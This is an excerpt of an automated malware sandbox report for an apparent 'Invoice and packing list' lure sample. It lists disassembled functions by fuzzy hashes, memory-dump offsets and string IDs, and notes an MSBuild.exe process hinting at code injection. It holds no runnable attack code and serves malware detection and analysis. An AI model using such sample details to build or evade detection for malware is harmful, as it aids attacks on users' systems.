Snapshot File: hcaresult_0_2_c6e0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d812bacd35e5f3a7932c48b56379667b613f42bbbfa4bba0a874643f0231dae5
Instruction ID: 3f3745a0d8067b795cd1ba744003f1b0b11bc48b1c4f1a6b10d6ddea52976b82
Opcode Fuzzy Hash: d812bacd35e5f3a7932c48b56379667b613f42bbbfa4bba0a874643f0231dae5
Instruction Fuzzy Hash: 7F313370D06219CBCB14CFA9D4487FEBBF5BB4A311F04946AD419B3341D3B40A46DBA4

Function 08D5AE07 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8e6fea144495b881012dd771a6b4401360d20edbaf515a57be221a34de0bc6b
Instruction ID: 939329851baf6d8be348942b091b1bebab1f7ca626f29318632187eaf308578a
Opcode Fuzzy Hash: c8e6fea144495b881012dd771a6b4401360d20edbaf515a57be221a34de0bc6b
Instruction Fuzzy Hash: 9231A232A01218DFCF05DFA4D955ADD7FB1EF48321F14466AE902BB261CB319E51CBA4

Function 00D7D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056373642.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af49ee0838cce3407dce045e184eafe9a2577f57e8ef4deb8e1bf80e11a39a1f
Instruction ID: 39ff6563b6ea58e1b55267af2d0ce09cc1ff7e655cd2d2f6502a5d153ebd1aa5
Opcode Fuzzy Hash: af49ee0838cce3407dce045e184eafe9a2577f57e8ef4deb8e1bf80e11a39a1f
Instruction Fuzzy Hash: 1421E2B1504204DFDB05DF14D9C0B16BB76EB94328F24C569D9090A256D336E856C6B1

Function 00D7D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056373642.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7cb24326a3a6d919748ddd67a367b6c0fd6e981af1b9c98484afea18682df87
Instruction ID: e929ea41163f9ce1964fdf768e3fafd48939e2e536a326e3d82231aa8bd88c55
Opcode Fuzzy Hash: d7cb24326a3a6d919748ddd67a367b6c0fd6e981af1b9c98484afea18682df87
Instruction Fuzzy Hash: A921C1B1504240DFDB05DF14D9C0B26BF76FF98318F28C569E9490A256D336D856CAB1

Function 08D59E51 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2709b9bcf267195abdf11f4f3fa08ea9e7ae90f58bde5d1ca0027ca8f0fb137f
Instruction ID: 5eac91b4c96e855f19dc770d165e7198bcdb912f51abd2ef86aeed3bdc287cf2
Opcode Fuzzy Hash: 2709b9bcf267195abdf11f4f3fa08ea9e7ae90f58bde5d1ca0027ca8f0fb137f
Instruction Fuzzy Hash: 2A31C2B5D012099FCB04CFA9D894AEDBFB1FF48340F10852AE85AA7350EB305A91CF60

Function 00D8D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056820738.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aa321de3ef813d02072528a3c5254c7e5f5db7aedd4d257b26a00b85656adf1
Instruction ID: dd08e83b98d6e4576d545eccdf1d332797b003ebff355d54845a813b2ea749c9
Opcode Fuzzy Hash: 0aa321de3ef813d02072528a3c5254c7e5f5db7aedd4d257b26a00b85656adf1
Instruction Fuzzy Hash: 9121D0B1604244EFDB14EF14D984B26BBA6EB84314F24C569E84A4B2C6C33AD807CB71

Function 00D8D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056820738.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50fa707eb9fa73a83a8d6228ab0b3267b700654bb5311ef5ce2a8d479859c67a
Instruction ID: 5ccbdf166a0b9275db8388a9c50c5b86190162691b6585a14547e4d4fa3d0f3a
Opcode Fuzzy Hash: 50fa707eb9fa73a83a8d6228ab0b3267b700654bb5311ef5ce2a8d479859c67a
Instruction Fuzzy Hash: AE21CFB1504204AFDB05EF54D980B26BBA6FB84314F24C669E8494B2D6C336D806CB75

Function 08D59870 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37cec852fbd49608df403e037bd285d9b51fc0c9061af0e4e356b02874f0ccf
Instruction ID: 8cb37770895637bd64fb4b6b37a91bd2c2d74fe44b17c1fd75a654aea0018ed1
Opcode Fuzzy Hash: f37cec852fbd49608df403e037bd285d9b51fc0c9061af0e4e356b02874f0ccf
Instruction Fuzzy Hash: E421D435D01209EFCB05CFA9D844ADEBBB2FF89310F14842AE915A7260DB716956DF90

Function 00D8D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056820738.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ad2a5c4da695b6a8ddd343f488404e6116507706e51dc3e22d09127bf7eb74
Instruction ID: ba7a22b3259b327863681f90ff6069e59dbb7b0d20d6e8b35f7a6ac10a8149a6
Opcode Fuzzy Hash: 69ad2a5c4da695b6a8ddd343f488404e6116507706e51dc3e22d09127bf7eb74
Instruction Fuzzy Hash: F02183755093808FDB12DF24D594715BF71EB46314F28C5DAD8498B6E7C33A980ACB62

Function 00D7D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056373642.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction ID: 58ab2f5472b642629c52138f75a041979cbb0bc3d600229b4ddb37492f3c2b63
Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction Fuzzy Hash: F1112672404240DFCB02CF00D5C4B16BF72FF94324F28C2A9D8090B656C33AE85ACBA1

Function 00D7D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056373642.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction ID: de083420cbeb3bc7dce69dae496899c938cdfd591c1a6ec34cb2774163cb8db8
Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction Fuzzy Hash: 5C11E676504280CFCB16CF14D5C4B16BF72FF94324F28C6A9D8490B656C336D85ACBA1

Function 08D59DB0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90846b2c50450f90df562856138c224e1f0c4cc69cc0c79b3262fea153faddf3
Instruction ID: a9d74abce4fd552ffa5890fa29f6d0d7e979436f1142d6e167392a6a8e28f868
Opcode Fuzzy Hash: 90846b2c50450f90df562856138c224e1f0c4cc69cc0c79b3262fea153faddf3
Instruction Fuzzy Hash: B91128B1C06249DFCB42CFA8C945BAEBFB1EF06300F1085AAE404E7262D7358A44CB91

Function 00D8D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056820738.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: bcc78c0ac87f2508750afc1b6fd2146926a3314c5eb9969045837b484211bd32
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: 0211DD75904280DFCB02DF14D5C4B15FBB2FB84314F28C6ADD8494B696C33AD80ACB61

Function 08D59DD0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2758693dae71693ef0c3b2885d3c71387a0091bc6bc14a6aad7035d230a8b2b
Instruction ID: ee8e9b804996903ee6be7ca14fa77cab9a61425b73e0750539ff4a4bba6fcd96
Opcode Fuzzy Hash: a2758693dae71693ef0c3b2885d3c71387a0091bc6bc14a6aad7035d230a8b2b
Instruction Fuzzy Hash: FA0108B5C01219DFCB40DFA8C545AAEBFF1FF48300F1085AAE904A7260E7318A50DF91

Function 08D59F49 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3cad3b8ab10c895ce582f1ff98d1ad7bbea9d8bd9ba61815d6b9e59ac13162
Instruction ID: 58c9c04070f77acea5f504b816ae75ac8089611f6839d3d50e0427358cba09f9
Opcode Fuzzy Hash: da3cad3b8ab10c895ce582f1ff98d1ad7bbea9d8bd9ba61815d6b9e59ac13162
Instruction Fuzzy Hash: 6BF09D79D05209DBCF00CFA8E8946EDBBF0FB48201F508166E812B7340D6355A519F60

Function 0C6E0F39 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070992443.000000000C6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c6e0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f35430eee6a8dae4ffff96ebc165ee5e6fa7373fa819897e73bc66767c1c5e
Instruction ID: c41db3e89b79568a39624c37ecc0952bfe1855895f20a3ec49c47dbef8a3753f
Opcode Fuzzy Hash: 19f35430eee6a8dae4ffff96ebc165ee5e6fa7373fa819897e73bc66767c1c5e
Instruction Fuzzy Hash: C4E086B0C4A25CAFC7159FE4A90059D7FB4AB03302F1481EFD440163A2D6750A55EBE6

Function 0C6E0317 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070992443.000000000C6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c6e0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16952a8b9ed7160eb6ce1c2e399fc86216d867200a68be111538cc591a0cbe8f
Instruction ID: 5332962aae1dfd93c9ccc569e942b59a0286878a4a6610bcc5e352493e6fdf1c
Opcode Fuzzy Hash: 16952a8b9ed7160eb6ce1c2e399fc86216d867200a68be111538cc591a0cbe8f
Instruction Fuzzy Hash: 2FC0123590401D87CF108B94F0542ECBBB0FB84226F104066D6556214492300A55DB90

Non-executed Functions

Function 08D5B850 Relevance: 6.7, Strings: 5, Instructions: 453COMMON

Download Yara Rule

Strings

(o]q, xrefs: 08D5BCFB
,aq, xrefs: 08D5BA8F
Haq, xrefs: 08D5BD68
,aq, xrefs: 08D5BA7F
(o]q, xrefs: 08D5BCF1

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$,aq$,aq$Haq
API String ID: 0-2157538030
Opcode ID: 8685eccd0e421573bd140d0e9d1aa6336cae4ddbc621ff0b713fff4b7a0a1ea3
Instruction ID: 6c5cfdde5662bf16680a42baf0226963c9cf72c68d4b83867a57d2e9cd633205
Opcode Fuzzy Hash: 8685eccd0e421573bd140d0e9d1aa6336cae4ddbc621ff0b713fff4b7a0a1ea3
Instruction Fuzzy Hash: 06022C34A00515DFDB18DF69C494A6DBBF2BF887A2B15865BE8069B374DB30EC41CB50

Function 051DF798 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

4']q, xrefs: 051DF892

Memory Dump Source

Source File: 00000000.00000002.2067258723.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51d0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 11028bf7b01985d463834b4c4aba9febd9d4701b11fd15f205cfa19a9654af78
Instruction ID: 518e56acb190b67ee3773403b4ff331ad803e9c0db5edbd384febdc5b24b143f
Opcode Fuzzy Hash: 11028bf7b01985d463834b4c4aba9febd9d4701b11fd15f205cfa19a9654af78
Instruction Fuzzy Hash: DE71F970A002098FD748EF7AF95169ABBF3FB88304F24C529E5089B259EF745946CB61

Function 051DF7C0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4']q, xrefs: 051DF892

Memory Dump Source

Source File: 00000000.00000002.2067258723.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51d0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 859da6b8dfeb0032d1d473fa52a6390d58e40a6f5b8d5fac6675aa3266c1c279
Instruction ID: cbdd39b29ee8026a961c9e7a16f9cbd3d902b686abfe7ac96ebc5465553c5056
Opcode Fuzzy Hash: 859da6b8dfeb0032d1d473fa52a6390d58e40a6f5b8d5fac6675aa3266c1c279
Instruction Fuzzy Hash: 3661EA70A002098FD748EF7AF95169ABBF3FB88304F14C529E50997359EF745906CB61

Function 0C6E1880 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070992443.000000000C6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C6E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c6e0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a97201435f6276610a2982910d16e87406a98d72f319ccfb1d6d963ec7343e7
Instruction ID: 4c59c05edc1cd731e0c9197abf2c58873b5316c36abb7a59ddfe056ba8f12652
Opcode Fuzzy Hash: 2a97201435f6276610a2982910d16e87406a98d72f319ccfb1d6d963ec7343e7
Instruction Fuzzy Hash: B0C18B717027048FDB29DB7AC450BAE77E6AF8A700F24846ED146EB392DB34E842D751

Function 071A8650 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da7b4dc841ba3167cee8542814dff0d948bde430cc8fe54f6f7ae2fc6adbc91
Instruction ID: 78cefd984f829aa5e51f446ac0c3fcf10c08801e9153b3b739d0155c01aea15a
Opcode Fuzzy Hash: 9da7b4dc841ba3167cee8542814dff0d948bde430cc8fe54f6f7ae2fc6adbc91
Instruction Fuzzy Hash: A0E1F6B4E102199FCB15DFA9C580AAEFBF2BF89305F24C169D814AB355DB30A941CF61

Function 071AA6B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 881fbae384dcb79480d927a45debfc58cdda7fcc33cd712795559212ec9a3230
Instruction ID: 4f8562f4d803e511c4ba97636e318e4ec9bbe5b061f792943493565d9a351289
Opcode Fuzzy Hash: 881fbae384dcb79480d927a45debfc58cdda7fcc33cd712795559212ec9a3230
Instruction Fuzzy Hash: 31E1E8B4E102199FCB14DFA9C581AAEFBF2BF89305F24C169D414AB355D730A942CFA1

Function 071A8EC0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a749d54dada105a0a9ce4be637242df1074620dac0238b09bdcca7f799db9960
Instruction ID: c303bc7abde7d4a9fb3c36a8c180cb9bf9981535532c4e7e5d88c242a9fb08ed
Opcode Fuzzy Hash: a749d54dada105a0a9ce4be637242df1074620dac0238b09bdcca7f799db9960
Instruction Fuzzy Hash: 32E1E9B4E1021A9FCB14DFA9C5809AEFBF2BF89305F24C16AD414AB355D731A981CF61

Function 071A8A88 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55dce54c543eb0c353693b9d6f881e56bcc1fb6e07ffc6dd288a9af1395d5652
Instruction ID: 79d0302d29b8e37ba584a9c9a90f16b9f66665ea542caa2a06a3646b79733bc9
Opcode Fuzzy Hash: 55dce54c543eb0c353693b9d6f881e56bcc1fb6e07ffc6dd288a9af1395d5652
Instruction Fuzzy Hash: 93E116B4E102199FCB15DFA9C980AAEFBF2BF89305F24C169D414AB355DB30A941CF61

Function 071AAAE8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce29d63d256c9e200a1a8550c14ad487836753e1bccaa585221ff97eaf2f5eb
Instruction ID: 577aea0503dca64fd1e4c3c34216e2bcf3b9dfb8ea8f6ff091c169aebce6a73f
Opcode Fuzzy Hash: 8ce29d63d256c9e200a1a8550c14ad487836753e1bccaa585221ff97eaf2f5eb
Instruction Fuzzy Hash: 10E1E6B4E102199FCB14DFA9C5809AEFBF2BF89305F24C16AD454AB355DB30A941CFA1

Function 00E0E0B4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057485829.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3776586ec4c28f861ca0b572a1d03d45e62f0927ce9fd649a9c4a1832c7de79
Instruction ID: 4e0ad6d2806eef91c1951e837a644cfef9185b4bedfe9ec6e4c0e6760e6fd563
Opcode Fuzzy Hash: b3776586ec4c28f861ca0b572a1d03d45e62f0927ce9fd649a9c4a1832c7de79
Instruction Fuzzy Hash: E4A15C32E002198FCF19DFB4D84459EB7B2FF85304B25557AE805BB2A5DB31E996CB80

Function 071A0B98 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b5b04bacf1f30a38149a5d37ebe261fae26be2a42264a9789f71198ffac9fe6
Instruction ID: 3810205e6b6f59263269a74de19648609bb2c010404552ef2f825212a945b192
Opcode Fuzzy Hash: 7b5b04bacf1f30a38149a5d37ebe261fae26be2a42264a9789f71198ffac9fe6
Instruction Fuzzy Hash: 5C9104B8D15219EFDB28DFA9C8847EDBBB5BF4A300F0091A9D409A7295EB305985CF10

Function 071AAAD9 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2068445311.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71a0000_Invoice and packing list.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d4b4c3ba61c7a24918a6d1ace28c3a7863bc53d48237e6157dd7f9a20f26676
Instruction ID: 868dc3717cab4a12599c2f3d9c563498018d5041b061a24dc7a790e08654ae34
Opcode Fuzzy Hash: 0d4b4c3ba61c7a24918a6d1ace28c3a7863bc53d48237e6157dd7f9a20f26676
Instruction Fuzzy Hash: 6E5118B4E102199BDB14DFA9C9805AEFBF2FF89304F24C16AD418A7355D7309942CFA1

Function 08D551C1 Relevance: 6.3, Strings: 5, Instructions: 67COMMON

Download Yara Rule

Strings

4']q, xrefs: 08D55251
4']q, xrefs: 08D55274
4']q, xrefs: 08D55297
4']q, xrefs: 08D5520B
4']q, xrefs: 08D5522E

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q
API String ID: 0-4248691736
Opcode ID: 41e09ceea8341280db7293ae241a7c4363e6917eedea5af1be461eef3e12852a
Instruction ID: daafa2f4604a5a56f9ccfa3b2bbc8a8d3badf7c3b6320a11b13b9bc799915362
Opcode Fuzzy Hash: 41e09ceea8341280db7293ae241a7c4363e6917eedea5af1be461eef3e12852a
Instruction Fuzzy Hash: 83217770B0010B9FCB08EFBED4516EE7FB2FF84704F10496991456B255EF345A458BA1

Function 08D551D0 Relevance: 6.3, Strings: 5, Instructions: 62COMMON

Download Yara Rule

Strings

4']q, xrefs: 08D55251
4']q, xrefs: 08D55274
4']q, xrefs: 08D55297
4']q, xrefs: 08D5520B
4']q, xrefs: 08D5522E

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q
API String ID: 0-4248691736
Opcode ID: c4fe3f66ba43d2265b9cf46034e7143aa1100b1bd8d4acf0f44a20d051f8c5e3
Instruction ID: 308d26153aef0d02e1baa63655c5bb5e6b0925176dc78debd076891cc18888c2
Opcode Fuzzy Hash: c4fe3f66ba43d2265b9cf46034e7143aa1100b1bd8d4acf0f44a20d051f8c5e3
Instruction Fuzzy Hash: C5213370B0010B9FDB08EFAAD5515EEBBB3FF84704F20886991456B295EF345A458BA2

Function 08D5EB20 Relevance: 5.2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

Strings

4']q, xrefs: 08D5EB3B
4']q, xrefs: 08D5EB96
4']q, xrefs: 08D5EBC6
$]q, xrefs: 08D5EBE8

Memory Dump Source

Source File: 00000000.00000002.2069140083.0000000008D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d50000_Invoice and packing list.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$$]q
API String ID: 0-3694760048
Opcode ID: 2595c6158befdd1c064736107c79385125c20b88b4c765cc361392644f03ff9b
Instruction ID: dae149d00887cf671f72b3c0516ecd92195abe1ed1f9a8f0a7d6b1af0761844f
Opcode Fuzzy Hash: 2595c6158befdd1c064736107c79385125c20b88b4c765cc361392644f03ff9b
Instruction Fuzzy Hash: EE4193743001158FCF29BA7D88A463E3BE7BBC8682719456EE447CB3A5DF20CD428791

Analysis Process: MSBuild.exePID: 3876, Parent PID: 4424COMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	52.6%
Total number of Nodes:	38
Total number of Limit Nodes:	3

Executed Functions

Function 018F2BF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01907BA5,000000FF,?,00000000,?,00001000,00000000,?,-00000018,7D810F61,?,?,?,?), ref: 018F2BFA

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ec78a2e63ab8da8da0110a8601553d9303d53f4be3c4a75a941b20a73250299
Instruction ID: e3dea9ac8d5daea074103c1802538796f44ccb41e1ef2ea82fdd02b5e971aea9
Opcode Fuzzy Hash: 4ec78a2e63ab8da8da0110a8601553d9303d53f4be3c4a75a941b20a73250299
Instruction Fuzzy Hash: C590023170190846D1817158440864A404997D1301F95C015A0065698DCA158B9977A1

Function 018F2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0190FD4F,000000FF,00000024,019A6634,00000004,00000000,?,-00000018,7D810F61,?,?,018C8B12,?,?,?,?), ref: 018F2C24

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
